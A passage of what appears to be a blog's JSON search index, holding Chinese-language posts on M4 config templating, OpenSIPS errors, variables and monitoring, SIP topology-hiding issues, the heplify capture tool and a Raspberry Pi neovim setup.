{ ... } ... 执行:m4 1.conf 1.m4\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ... 读取环境变量 define(`MY_NAME\u0026#39;, `esyscmd(`printf \u0026#34;${MY_NAME:-wdd}\u0026#34;\u0026#39;)\u0026#39;)dnl ","permalink":"https://wdd.js.org/posts/2021/09/","summary":"文本处理的难点 有一个文本文件,内容如下,摘抄其中两行内容如下,里面有两个配置db_addr, local_ip这两个配置,需要在不同环境要修改的。\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.4 但是哪些地方要修改呢?为了提醒后续的维护者,我们给要修改的地方加个备注吧。\ndb_addr=1.2.3.4:3306 # 这里要修改 local_ip=192.168.2.4 # 这里要修改 .... ... if len(a) = 1024 { # 这里要修改1024 ... } ... 用sed替换? 让别人一个一个地方去修改,也太麻烦了,有没有可能用脚本去处理呢?例如我们用DB_ADDR和LOCAL_IP这种字符串作为占位符,然后我们就可以用sed之类的命令去做替换了。\ndb_addr=DB_ADDR local_ip=LOCAL_IP sed -i \u0026#39;s/DB_ADDR/1.2.3.4:3306/g;s/LOCAL_IP/192.168.0.1/g\u0026#39; 1.cfg 这样做是有点方便了,但是也有以下几个问题\n如果定义的占位符太多,sed会变得越来越长 如果某些占位符里本身就含有/或者一些特殊含义的字符,就需要做特殊处理了 用M4吧,专业的人做专业的事情 apt-get install m4 通过命令行定义宏 1.m4\ndb_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... M4可以使用-D来定义宏和宏对应的值,默认输出到标准输出,我们可以用\u0026gt;将输出写到文件中\nm4 -D DB_ADDR=1.2.3.4:3306 -D LOCAL_IP=192.168.2.2 -D MAX_LEN=2048 1.m4 db_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { .","title":"简单实用的M4教程"},{"content":"ERROR:core:tcp_init_listener: could not get TCP protocol number CRITICAL:core:send_fd: sendmsg failed on 0: Socket operation on non-socket ERROR:core:send2child: send_fd failed 不要将tcp_child设置为0\n","permalink":"https://wdd.js.org/opensips/ch7/sendmsg-failed/","summary":"ERROR:core:tcp_init_listener: could not get TCP protocol number CRITICAL:core:send_fd: sendmsg failed on 0: Socket operation on non-socket ERROR:core:send2child: send_fd failed 不要将tcp_child设置为0","title":"sendmsg failed on 0: Socket operation on non-socket"},{"content":"问题表现 在经过初始化请求之后,路径发现完成。在这个dialog中所有的请求,正常来ua1和ua2之间的所有请求,都应该经过us1和us2。\n如下图所示:\n某些时候,ua1可能直接把BYE消息直接发送给ua2, 但是一般ua1和ua2是存在uat网络的,所以这个BYE消息,ua2很可能收不到。\n问题的表现就是电话无法正常挂断。\n问题分析 可能原因1: us1和us2没有做record-route, 导致请求直接根据某个请求的响应消息的Contact头,直接发送了。 可能原因2: 某些请求的拓扑隐藏没有做好 拓扑隐藏问题具体分析 假如我们在us1上正确的做了拓扑隐藏,那么ua1的所有收到的响应,它的Contact头的地址都会改成us1的地址。那么ua1是无论如何都获取不到ua2的直接地址的。\n但是,假如某个消息处理的不对呢?\n注意180响应5到6, 其中us1正确的修改了Contact头 ua1收到180后,立即发送了notify消息 如果us1没有正确处理notify的响应的Contact头,us1就会把ua2的Contact信息发送给ua1。有些notify的响应带有Contact头,有些没带有。 但是这里会出现一个竞争条件,invite的200ok和notify的200ok,消息到达的顺序,将影响ua2的Contact信息 如果ua1后收到invite的200ok, 此时ua1获取ua2的地址是us1 如果ua2后收到notify的200ok, 此时ua2获取的ua2的地址就是ua2 所以问题的表现可能是有偶现的,这种问题处理其实是比较棘手的 当然也是有解决方案的 方案1, us1对notify正确处理响应消息Contact, 将其修改成us1 方案2,us1直接删除notify响应消息的Contact头 ","permalink":"https://wdd.js.org/opensips/ch7/escape-msg/","summary":"问题表现 在经过初始化请求之后,路径发现完成。在这个dialog中所有的请求,正常来ua1和ua2之间的所有请求,都应该经过us1和us2。\n如下图所示:\n某些时候,ua1可能直接把BYE消息直接发送给ua2, 但是一般ua1和ua2是存在uat网络的,所以这个BYE消息,ua2很可能收不到。\n问题的表现就是电话无法正常挂断。\n问题分析 可能原因1: us1和us2没有做record-route, 导致请求直接根据某个请求的响应消息的Contact头,直接发送了。 可能原因2: 某些请求的拓扑隐藏没有做好 拓扑隐藏问题具体分析 假如我们在us1上正确的做了拓扑隐藏,那么ua1的所有收到的响应,它的Contact头的地址都会改成us1的地址。那么ua1是无论如何都获取不到ua2的直接地址的。\n但是,假如某个消息处理的不对呢?\n注意180响应5到6, 其中us1正确的修改了Contact头 ua1收到180后,立即发送了notify消息 如果us1没有正确处理notify的响应的Contact头,us1就会把ua2的Contact信息发送给ua1。有些notify的响应带有Contact头,有些没带有。 但是这里会出现一个竞争条件,invite的200ok和notify的200ok,消息到达的顺序,将影响ua2的Contact信息 如果ua1后收到invite的200ok, 此时ua1获取ua2的地址是us1 如果ua2后收到notify的200ok, 此时ua2获取的ua2的地址就是ua2 所以问题的表现可能是有偶现的,这种问题处理其实是比较棘手的 当然也是有解决方案的 方案1, us1对notify正确处理响应消息Contact, 将其修改成us1 方案2,us1直接删除notify响应消息的Contact头 ","title":"信令路径逃逸分析"},{"content":"hepfily是个独立的抓包程序,类似于tcpdump之类的,网络抓包程序,可以把抓到的sip包,编码为hep格式。然后送到hep server上,由hepserver负责包的整理和存储。\nheplify安装非常简单,在仓库的release页面,可以下载二进程程序。二进程程序赋予可执行权限后,可以直接在x86架构的机器上运行。\n因为heplify是go语言写的,你也可以基于源码,编译其他架构的二进制程序。\nhttps://github.com/sipcapture/heplify\n-i 设定抓包的网卡 -m 设置抓包模式为SIP -hs 设置hep server的地址 -p 设置日志文件的日志 -dim 设置过滤一些不关心的sip包 -pr 设置抓包的端口范围 nohup ./heplify \\ -i eno1 \\ -m SIP \\ -hs 192.168.1.2:9060 \\ -p \u0026#34;/var/log/\u0026#34; \\ -dim OPTIONS,REGISTER \\ -pr \u0026#34;18627-18628\u0026#34; \u0026amp; opensips模块本身就有proto_hep模块支持hep抓包,为什么我还要用heplify来抓包呢?\n低于2.2版本的opensips不支持hep抓包 opensips的hep抓包还是不太稳定。我曾遇到过因为hep抓包导致opensips崩溃的事故。如果用外部的抓包程序,即使抓包有问题,还是不会影响到opensips。 ","permalink":"https://wdd.js.org/opensips/tools/heplify/","summary":"hepfily是个独立的抓包程序,类似于tcpdump之类的,网络抓包程序,可以把抓到的sip包,编码为hep格式。然后送到hep server上,由hepserver负责包的整理和存储。\nheplify安装非常简单,在仓库的release页面,可以下载二进程程序。二进程程序赋予可执行权限后,可以直接在x86架构的机器上运行。\n因为heplify是go语言写的,你也可以基于源码,编译其他架构的二进制程序。\nhttps://github.com/sipcapture/heplify\n-i 设定抓包的网卡 -m 设置抓包模式为SIP -hs 设置hep server的地址 -p 设置日志文件的日志 -dim 设置过滤一些不关心的sip包 -pr 设置抓包的端口范围 nohup ./heplify \\ -i eno1 \\ -m SIP \\ -hs 192.168.1.2:9060 \\ -p \u0026#34;/var/log/\u0026#34; \\ -dim OPTIONS,REGISTER \\ -pr \u0026#34;18627-18628\u0026#34; \u0026amp; opensips模块本身就有proto_hep模块支持hep抓包,为什么我还要用heplify来抓包呢?\n低于2.2版本的opensips不支持hep抓包 opensips的hep抓包还是不太稳定。我曾遇到过因为hep抓包导致opensips崩溃的事故。如果用外部的抓包程序,即使抓包有问题,还是不会影响到opensips。 ","title":"heplify SIP信令抓包客户端"},{"content":"简介 OpenSIPS的路由脚本提供了几种不同类型的变量。不同类型的变量有以下几个方面的差异。\n变量的可见性 变量引用的值 变量的读写性质:有些变量是只读的,有些变量可读可写 变量是否有多个值:有些变量只有一个值,有些变量有多个值 语法 $(\u0026lt;context\u0026gt;name(subname)[index]{tramsformation}) 除了name以外 ,其他都是可选的值。\nname(必传):变量名的类型,例如pvar, avp, ru, DLG_status等等 subname: 变量名称,例如hdr(From), avp(name) index: 索引,某些变量可以有多个值,类似于数组。可以用索引去引用对应的元素。从0开始,也可以是负值如-1, 表示倒数第一个。 transformation: 转换。做一些格式转换,字符串截取等等操作 context: 上下文。OpenSIP有两个上下午,请求request、相应reply。想想一个场景,你在一个相应路由里如何拿到请求路由的某个值呢? 可以使用$(ru). 或者在一个失败路由里获取一个Concact的信息$(hdr(Contact)) 举例:\n仅仅通过类型来引用:$ru 通过类型和名称来引用:$hrd(Contact), 引用某个SIP header的值 通过类型和索引来引用:$(ct[0]) 通过类型、名称、索引来引用:$(avp(addr)[0]) 变量的类型 脚本变量 脚本变量只有一个值 脚本变量可读可写 脚本变量在路由及其子路由中都是可见的 脚本变量使用前务必先初始化,否则可能会引用到之前的值 脚本变量的值可以是字符串,也可以是整数类型 脚本变量读写比avp变量快 脚本变量会持久存在一个OpenSIPS进程中 将脚本变量设置为NULL, 实际上是将变量的值设置为'0\u0026rsquo;, 脚本变量没有NULL值。 脚本变量之存在与一个路由中 使用举例\nroute{ $var(a) = 19 $var(a) = \u0026#34;wdd\u0026#34; $var(a) = \u0026#34;wdd\u0026#34; + \u0026#34;@\u0026#34; + $td; if(route(check_out, 1)){ xlog(\u0026#34;check error\u0026#34;); } } route[check_out]{ # 注意,这里$var(a)的值就不存在了 xlog(\u0026#34;$var(a)\u0026#34;); if ($param(1) \u0026gt; 1) { return (-1); } return(1); } avp变量 avp变量一般会关联到一个sip消息或者SIP事务上. avp变量可以有多个值 可以avp变量理解成一个后进先出的栈 所有处理这个消息的子路由都可以获得avp的变量。但是如果想在响应路由中想获取请求路由中的avp变量,则需要设置TM模块的onreply_avp_mode参数:modparam(\u0026quot;tm\u0026quot;,\u0026quot;onreply_avp_mode\u0026quot;, 1) $avp(trunk)=\u0026#34;hello\u0026#34;; $avp(trunk)=\u0026#34;duan\u0026#34;; $avp(trunk)=\u0026#34;hi\u0026#34;; # 可以把trunk的值理解成下面的样子 # hi -\u0026gt; duan -\u0026gt; hello xlog(\u0026#34;$avp(trunk)\u0026#34;); 这里只能打印出hi xlog(\u0026#34;$(avp(trunk)[2])\u0026#34;); 这里能打印hello $avp(trunk)=NULL; 这里能删除最后的一个值,如果只有一个值,那么整个avp会被删除 avp_delete(\u0026#34;$avp(trunk)/g\u0026#34;); # 删除avp所有的值,包括这个avp自身。 $(avp(trunk)[1])=\u0026#34;heihei\u0026#34;; 重新赋值 $(avp(trunk)[1])=NULL; 删除某一个值 伪变量 伪变量主要是对SIP消息的各个部分进行引用的\n大部分伪变量很好接,都是缩写的单词的首字母。\n伪变量以$开头,加sip消息字段的缩写,例如$ci, 代表sip callID 序号 名称 是否可修改 含义 1 $ai 引用P-Asserted-Identify头的url 2 $adu Authentication Digest URI 3 $ar Authentication realm 4 $au Auth username user 5 $ad Auth username domain 6 $an Auth nonce 7 $auth.resp Auth response 8 $auth.nonce Auth nonce 9 $auth.opaque the opaque 字符串 10 $auth.alg 认证算法 11 $auth.qop qop参数的值 12 $auth.nc nonce count参数 13 $aU 整个username 14 $Au 计费用的账户名,主要是acc会用 15 $argv 获取通过命令行参数设置参数-o。例如在启动opensips时```bash opensips -o maxsiplength=1200 \u0026lt;br /\u0026gt;\u0026lt;br /\u0026gt;在脚本里就可以通过$argv(maxsiplength)\u0026lt;br /\u0026gt;```bash xlog(\u0026#34;maxsiplength: is $argv(maxsiplength)\u0026#34;) | | 16 | $af | | ip协议,可能是INET(ipv4), 或者是INET6(ipv6) | | 17 | $branch | | 用来创建新的分支```bash $branch=\u0026ldquo;sip:new#domain\u0026rdquo;;\n| | 18 | $branch() | | \u0026lt;br /\u0026gt;- $branch(uri)\u0026lt;br /\u0026gt;- $branch(duri)\u0026lt;br /\u0026gt;- $branch(q)\u0026lt;br /\u0026gt;- $branch(path)\u0026lt;br /\u0026gt;- $branch(flags)\u0026lt;br /\u0026gt;- $branch(socket)\u0026lt;br /\u0026gt; | | 19 | **$ci** | | 引用sip call-id。 (call-id) | | 20 | **$cl** | | 引用sip body部分的长度。(content-length) | | 21 | $cs | | 引用 cseq number | | 22 | $ct | | 引用Contact\u0026lt;br /\u0026gt;- $ci\u0026lt;br /\u0026gt;- $(ct[n])\u0026lt;br /\u0026gt;- $(ct[-n])\u0026lt;br /\u0026gt; | | 23 | $ct.fields() | \u0026lt;br /\u0026gt; | \u0026lt;br /\u0026gt;- $ct.fields(name)\u0026lt;br /\u0026gt;- $ct.fields(uri)\u0026lt;br /\u0026gt;- $ct.fields(q)\u0026lt;br /\u0026gt;- $ct.fields(expires)\u0026lt;br /\u0026gt;- $ct.fields(methods)\u0026lt;br /\u0026gt;- $ct.fields(received)\u0026lt;br /\u0026gt;- $ct.fields(params) 所有的参数\u0026lt;br /\u0026gt; | | 24 | $cT | | \u0026lt;br /\u0026gt;- $cT Content-Type\u0026lt;br /\u0026gt;- $(cT[n])\u0026lt;br /\u0026gt;- $(cT[-n])\u0026lt;br /\u0026gt;- $(cT[*])\u0026lt;br /\u0026gt; | | 25 | **$dd** | | 引用目标url里面的domain部分 | | 26 | $di | | diversion header | | 27 | $dip | | diversion privacy prameter | | 29 | $dir | | diversion reason parameter | | 30 | $dp | | 目标url的端口号部分 (destionation port) | | 31 | $dP | | 目标url的传输协议部分 (destionation protocol) | | 32 | $ds | | destionation set | | 33 | **$du** | | 引用 destionation url | | 34 | $err.class | | 错误的类别\u0026lt;br /\u0026gt;- 1 解析错误\u0026lt;br /\u0026gt; | | 35 | $err.level | | 错误的级别 | | 36 | $err.info | | 错误信息的描述 | | 37 | $err.rcode | | error reply code | | 38 | $err.rreason | | error reply reason | | 39 | **$fd** | | From URI domain | | 40 | **$fn** | | From display name | | 41 | **$fs** | | 强制使用某个地址发送消息。 (forced socket)\u0026lt;br /\u0026gt;格式:proto:ip:port | | 42 | $ft | | From tag | | 43 | **$fu** | | From URL | | 44 | **$fU** | | username in From URL | | 45 | **$log_level** | | 可以用来动态修改日志级别\u0026lt;br /\u0026gt;$log_level=4;\u0026lt;br /\u0026gt;\u0026lt;br /\u0026gt;$log_level=NULL; 恢复默认值 | | 46 | $mb | | sip message buffer | | 47 | $mf | | message flags | | 48 | $mi | | sip message id | | 49 | **$ml** | | sip message length | | 50 | $od | | domain in original R-URI | | 51 | $op | | port in original R-URI | | 52 | $oP | | transport protocol of original R-URI | | 53 | $ou | | original URI | | 54 | $oU | | username in original URI | | 55 | **$param(idx)** | | 引用路由参数,从1开始\u0026lt;br /\u0026gt;```bash route{ route(R_NAME, $var(debug), \u0026#34;pp\u0026#34;); } route[R_NAME]{ $param(1); #引用第一个参数 $var(debug) $param(2); #引用第二个参数 pp } | | 56 | $pd | | domain in sip P-Prefered-Identify header | | 57 | $pn | | display name in sip P-Prefered-Identify header | | 58 | $pp | | process id | | 59 | $pr $proto | | 接受消息的协议 UDP, TCP, TLS, SCTP, WS | | 60 | $pu | | URL in sip P-Prefered-Identify header | | 61 | $rd | | domain in request url | | 62 | $rb | | body of request/replay- $rb- $(rb[*])- $(rb[n])- $(rb[-n])- $rb(application/sdp)- $rb(application/isup) | | 63 | $rc $retcode | | 上个函数的返回结果 | | 64 | $re | | remote-party-id | | 65 | $rm | | sip method | | 66 | $rp | | port of R-RUI | | 67 | $rP | | transport protocol pf R-URI | | 68 | $rr | | reply reason | | 69 | $rs | | reply status | | 70 | $ru | | request url | | 71 | $rU | | | | 72 | $ru_q | | | | 73 | $Ri | | | | 74 | $Rp | | | | 75 | $sf | | | | 76 | $si | | | | 77 | $sp | | | | 78 | $tt | | | | 79 | $tu | | | | 80 | $tU | | | | 81 | $time(format) | | | | 82 | $T_branch_idx | | | | 83 | $Tf | | | | 84 | $Ts | | | | 85 | $Tsm | | | | 86 | $TS | | | | 87 | $ua | | | | 88 | $(hdr(name)[N]) | | | | 89 | $rT | | | | 90 | $cfg_line $cfg_file | | | | 91 | $xlog_level | | |\n","permalink":"https://wdd.js.org/opensips/ch5/core-var-2/","summary":"简介 OpenSIPS的路由脚本提供了几种不同类型的变量。不同类型的变量有以下几个方面的差异。\n变量的可见性 变量引用的值 变量的读写性质:有些变量是只读的,有些变量可读可写 变量是否有多个值:有些变量只有一个值,有些变量有多个值 语法 $(\u0026lt;context\u0026gt;name(subname)[index]{tramsformation}) 除了name以外 ,其他都是可选的值。\nname(必传):变量名的类型,例如pvar, avp, ru, DLG_status等等 subname: 变量名称,例如hdr(From), avp(name) index: 索引,某些变量可以有多个值,类似于数组。可以用索引去引用对应的元素。从0开始,也可以是负值如-1, 表示倒数第一个。 transformation: 转换。做一些格式转换,字符串截取等等操作 context: 上下文。OpenSIP有两个上下午,请求request、相应reply。想想一个场景,你在一个相应路由里如何拿到请求路由的某个值呢? 可以使用$(ru). 或者在一个失败路由里获取一个Concact的信息$(hdr(Contact)) 举例:\n仅仅通过类型来引用:$ru 通过类型和名称来引用:$hrd(Contact), 引用某个SIP header的值 通过类型和索引来引用:$(ct[0]) 通过类型、名称、索引来引用:$(avp(addr)[0]) 变量的类型 脚本变量 脚本变量只有一个值 脚本变量可读可写 脚本变量在路由及其子路由中都是可见的 脚本变量使用前务必先初始化,否则可能会引用到之前的值 脚本变量的值可以是字符串,也可以是整数类型 脚本变量读写比avp变量快 脚本变量会持久存在一个OpenSIPS进程中 将脚本变量设置为NULL, 实际上是将变量的值设置为'0\u0026rsquo;, 脚本变量没有NULL值。 脚本变量之存在与一个路由中 使用举例\nroute{ $var(a) = 19 $var(a) = \u0026#34;wdd\u0026#34; $var(a) = \u0026#34;wdd\u0026#34; + \u0026#34;@\u0026#34; + $td; if(route(check_out, 1)){ xlog(\u0026#34;check error\u0026#34;); } } route[check_out]{ # 注意,这里$var(a)的值就不存在了 xlog(\u0026#34;$var(a)\u0026#34;); if ($param(1) \u0026gt; 1) { return (-1); } return(1); } avp变量 avp变量一般会关联到一个sip消息或者SIP事务上.","title":"核心变量解读-100%"},{"content":"配置 树莓派3B+的配置\n4核1G CPU ARMv7 Processor 64G SD卡 常用软件 neovim LXTerminal终端 chrome浏览器 谷歌拼音输入法 常用语言 golang c nodejs 外设 键盘鼠标: 雷柏 无线机械键盘加鼠标 150块左右 屏幕:一块ipad大小外接屏幕,400块左右 常用工作 Golang UDP Server开发, 总体还算流畅。前提时不要加载太多的neovim插件,特别象coc-vim, go-vim等插件,安装过后让你卡的绝望。每次当我绝望之时,我就关闭了图形界面,回到终端继续干活。但是即使使用纯文本方式登录,运行vim还是很卡。 后来我在macbook pro上也用neovim开发,发现也是很卡。于是我就释然了,9千多的macbook都卡,300多的树莓派卡一点怎么了! 但是卡顿还是非常影响心情的,于是我就大量精简vim的插件。 我基本上就用两个插件,都是和状态栏有关的。其他十二个插件都给注释掉了 call plug#begin(\u0026#39;~/.vim/plugged\u0026#39;) Plug \u0026#39;vim-airline/vim-airline\u0026#39; Plug \u0026#39;vim-airline/vim-airline-themes\u0026#39; Plug \u0026#39;jiangmiao/auto-pairs\u0026#39; \u0026#34;Plug \u0026#39;yonchu/accelerated-smooth-scroll\u0026#39; \u0026#34;Plug \u0026#39;preservim/tagbar\u0026#39;, { \u0026#39;for\u0026#39;: [\u0026#39;go\u0026#39;, \u0026#39;c\u0026#39;]} \u0026#34;Plug \u0026#39;airblade/vim-gitgutter\u0026#39; \u0026#34;Plug \u0026#39;fatih/vim-go\u0026#39;, { \u0026#39;do\u0026#39;: \u0026#39;:GoUpdateBinaries\u0026#39;, \u0026#39;for\u0026#39;: \u0026#39;go\u0026#39; } \u0026#34;Plug \u0026#39;dense-analysis/ale\u0026#39; \u0026#34;Plug \u0026#39;vim-scripts/matchit.zip\u0026#39; \u0026#34;Plug \u0026#39;pangloss/vim-javascript\u0026#39;, {\u0026#39;for\u0026#39;:\u0026#39;javascript\u0026#39;} \u0026#34;Plug \u0026#39;leafgarland/typescript-vim\u0026#39; \u0026#34;Plug \u0026#39;neoclide/coc.nvim\u0026#39;, {\u0026#39;branch\u0026#39;: \u0026#39;release\u0026#39;} \u0026#34;Plug \u0026#39;jremmen/vim-ripgrep\u0026#39; \u0026#34;Plug \u0026#39;plasticboy/vim-markdown\u0026#39; \u0026#34;Plug \u0026#39;mzlogin/vim-markdown-toc\u0026#39; call plug#end() filetype plugin indent on filetype plugin on filetype indent on set guicursor= set history=1000 let g:netrw_banner=0 let g:ale_linters = { \\ \u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;], \\ \u0026#39;typescript\u0026#39;: [\u0026#39;tsserver\u0026#39;] \\} let g:ale_fixers = {\u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;]} let g:ale_lint_on_save = 1 let g:ale_fix_on_save = 1 let g:ale_typescript_tsserver_executable=\u0026#39;tsserver\u0026#39; let g:airline#extensions#tabline#enabled = 1 let g:ale_set_loclist = 0 let g:ale_set_quickfix = 1 let g:ale_open_list = 0 let g:vim_markdown_folding_disabled = 1 let g:vmt_cycle_list_item_markers = 1 let g:tagbar_sort = 0 \u0026#34; colorscheme codedark \u0026#34; let g:airline_theme = \u0026#39;codedark\u0026#39; \u0026#34; \u0026#34; buffer let mapleader = \u0026#34;,\u0026#34; nnoremap \u0026lt;Leader\u0026gt;j :bp\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;k :bn\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;n :bf\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;m :bl\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;l :b#\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;e :e\u0026lt;CR\u0026gt; \u0026#34; open netrw nnoremap \u0026lt;Leader\u0026gt;d :bd\u0026lt;CR\u0026gt; \u0026#34; close buffer nnoremap \u0026lt;Leader\u0026gt;g :!go fmt %\u0026lt;CR\u0026gt; \u0026#34; go fmt current file nnoremap \u0026lt;Leader\u0026gt;tm :%s/\\s\\+$//e\u0026lt;CR\u0026gt; \u0026#34; trim space at endofline nnoremap \u0026lt;Leader\u0026gt;a A nnoremap \u0026lt;Leader\u0026gt;w :w\u0026lt;CR\u0026gt; nnoremap \u0026lt;Leader\u0026gt;c :clo\u0026lt;CR\u0026gt; nnoremap \u0026lt;Leader\u0026gt;/ :Rg\u0026lt;Space\u0026gt; inoremap jj \u0026lt;ESC\u0026gt; highlight CocErrorFloat ctermfg=White let g:netrw_list_hide= \u0026#39;.*\\.swp$\u0026#39; let g:ctrlp_custom_ignore = { \\ \u0026#39;dir\u0026#39;: \u0026#39;\\v[\\/]\\.?(git|hg|svn|node_modules)$\u0026#39;, \\ \u0026#39;file\u0026#39;: \u0026#39;\\v\\.(exe|so|dll|min.js)$\u0026#39;, \\ \u0026#39;link\u0026#39;: \u0026#39;some_bad_symbolic_links\u0026#39;, \\ } set autoread \u0026#34; au CursorHold,CursorHoldI * :e \u0026#34; au FocusGained,BufEnter * :e set so=7 set ruler set cmdheight=2 set hid set backspace=eol,start,indent set whichwrap+=\u0026lt;,\u0026gt;,h,l set ignorecase set smartcase set hlsearch set incsearch set showmatch set mat=2 syntax enable set background=dark set ffs=unix,dos,mac \u0026#34;set ai \u0026#34;Auto indent \u0026#34;set si \u0026#34;Smart indent set wrap \u0026#34;Wrap lines set cursorline set tabstop=4 set shiftwidth=4 set expandtab set background=dark \u0026#34; colorscheme solarized \u0026#34; let g:ackprg = \u0026#39;rg --vimgrep --type-not sql --smart-case\u0026#39; map ; : autocmd FileType javascript setlocal ts=2 sts=2 shiftwidth=2 但是没有go-vim写golang还是不太方便的,特别是保存的时候格式化,但是也有方案, 执行vim的Ex命令,:!go fmt % 视频 看视频是非常危险的行为,有可能需要强制关机重启。 ","permalink":"https://wdd.js.org/posts/2021/08/mlg4mt/","summary":"配置 树莓派3B+的配置\n4核1G CPU ARMv7 Processor 64G SD卡 常用软件 neovim LXTerminal终端 chrome浏览器 谷歌拼音输入法 常用语言 golang c nodejs 外设 键盘鼠标: 雷柏 无线机械键盘加鼠标 150块左右 屏幕:一块ipad大小外接屏幕,400块左右 常用工作 Golang UDP Server开发, 总体还算流畅。前提时不要加载太多的neovim插件,特别象coc-vim, go-vim等插件,安装过后让你卡的绝望。每次当我绝望之时,我就关闭了图形界面,回到终端继续干活。但是即使使用纯文本方式登录,运行vim还是很卡。 后来我在macbook pro上也用neovim开发,发现也是很卡。于是我就释然了,9千多的macbook都卡,300多的树莓派卡一点怎么了! 但是卡顿还是非常影响心情的,于是我就大量精简vim的插件。 我基本上就用两个插件,都是和状态栏有关的。其他十二个插件都给注释掉了 call plug#begin(\u0026#39;~/.vim/plugged\u0026#39;) Plug \u0026#39;vim-airline/vim-airline\u0026#39; Plug \u0026#39;vim-airline/vim-airline-themes\u0026#39; Plug \u0026#39;jiangmiao/auto-pairs\u0026#39; \u0026#34;Plug \u0026#39;yonchu/accelerated-smooth-scroll\u0026#39; \u0026#34;Plug \u0026#39;preservim/tagbar\u0026#39;, { \u0026#39;for\u0026#39;: [\u0026#39;go\u0026#39;, \u0026#39;c\u0026#39;]} \u0026#34;Plug \u0026#39;airblade/vim-gitgutter\u0026#39; \u0026#34;Plug \u0026#39;fatih/vim-go\u0026#39;, { \u0026#39;do\u0026#39;: \u0026#39;:GoUpdateBinaries\u0026#39;, \u0026#39;for\u0026#39;: \u0026#39;go\u0026#39; } \u0026#34;Plug \u0026#39;dense-analysis/ale\u0026#39; \u0026#34;Plug \u0026#39;vim-scripts/matchit.zip\u0026#39; \u0026#34;Plug \u0026#39;pangloss/vim-javascript\u0026#39;, {\u0026#39;for\u0026#39;:\u0026#39;javascript\u0026#39;} \u0026#34;Plug \u0026#39;leafgarland/typescript-vim\u0026#39; \u0026#34;Plug \u0026#39;neoclide/coc.nvim\u0026#39;, {\u0026#39;branch\u0026#39;: \u0026#39;release\u0026#39;} \u0026#34;Plug \u0026#39;jremmen/vim-ripgrep\u0026#39; \u0026#34;Plug \u0026#39;plasticboy/vim-markdown\u0026#39; \u0026#34;Plug \u0026#39;mzlogin/vim-markdown-toc\u0026#39; call plug#end() filetype plugin indent on filetype plugin on filetype indent on set guicursor= set history=1000 let g:netrw_banner=0 let g:ale_linters = { \\ \u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;], \\ \u0026#39;typescript\u0026#39;: [\u0026#39;tsserver\u0026#39;] \\} let g:ale_fixers = {\u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;]} let g:ale_lint_on_save = 1 let g:ale_fix_on_save = 1 let g:ale_typescript_tsserver_executable=\u0026#39;tsserver\u0026#39; let g:airline#extensions#tabline#enabled = 1 let g:ale_set_loclist = 0 let g:ale_set_quickfix = 1 let g:ale_open_list = 0 let g:vim_markdown_folding_disabled = 1 let g:vmt_cycle_list_item_markers = 1 let g:tagbar_sort = 0 \u0026#34; colorscheme codedark \u0026#34; let g:airline_theme = \u0026#39;codedark\u0026#39; \u0026#34; \u0026#34; buffer let mapleader = \u0026#34;,\u0026#34; nnoremap \u0026lt;Leader\u0026gt;j :bp\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;k :bn\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;n :bf\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;m :bl\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;l :b#\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;e :e\u0026lt;CR\u0026gt; \u0026#34; open netrw nnoremap \u0026lt;Leader\u0026gt;d :bd\u0026lt;CR\u0026gt; \u0026#34; close buffer nnoremap \u0026lt;Leader\u0026gt;g :!","title":"使用树莓派3b+作为辅助开发体验"},{"content":"日志监控 务必监控opensips日志,如果其中出现了CRITICAL关键字, 很可能马上opensips就要崩溃。\n第一要发出告警信息。第二要有主动的自动重启策略,例如使用systemd启动的话,服务崩溃会会立马被重启。或者用docker或者k8s,这些虚拟化技术,可以让容器崩溃后自动重启。\n指标监控 opensips有内部的统计模块,可以很方便的通过opensipsctl或者相关的http的mi接口获取到内部的统计数据。\n以下给出几个关键的统计指标:\n\u0026rsquo;total_size\u0026rsquo;, 全部内存 \u0026lsquo;used_size\u0026rsquo;, 使用的内存 \u0026lsquo;real_used_size\u0026rsquo;, 真是使用的内存 \u0026lsquo;max_used_size\u0026rsquo;, 最大使用的内存 \u0026lsquo;free_size\u0026rsquo;, 空闲内存 \u0026lsquo;fragments\u0026rsquo;, \u0026lsquo;active_dialogs\u0026rsquo;, 接通状态的通话 \u0026rsquo;early_dialogs\u0026rsquo;, 振铃状态的通话 \u0026lsquo;inuse_transactions\u0026rsquo;, 正在使用的事务 \u0026lsquo;waiting_udp\u0026rsquo;, 堆积的udp消息 \u0026lsquo;waiting_tcp\u0026rsquo; 堆积的tcp消息 当然还有很多的一些指标,可以使用:opensipsctl fifo get_statistics all来获取。\n","permalink":"https://wdd.js.org/opensips/ch3/prd-warning/","summary":"日志监控 务必监控opensips日志,如果其中出现了CRITICAL关键字, 很可能马上opensips就要崩溃。\n第一要发出告警信息。第二要有主动的自动重启策略,例如使用systemd启动的话,服务崩溃会会立马被重启。或者用docker或者k8s,这些虚拟化技术,可以让容器崩溃后自动重启。\n指标监控 opensips有内部的统计模块,可以很方便的通过opensipsctl或者相关的http的mi接口获取到内部的统计数据。\n以下给出几个关键的统计指标:\n\u0026rsquo;total_size\u0026rsquo;, 全部内存 \u0026lsquo;used_size\u0026rsquo;, 使用的内存 \u0026lsquo;real_used_size\u0026rsquo;, 真是使用的内存 \u0026lsquo;max_used_size\u0026rsquo;, 最大使用的内存 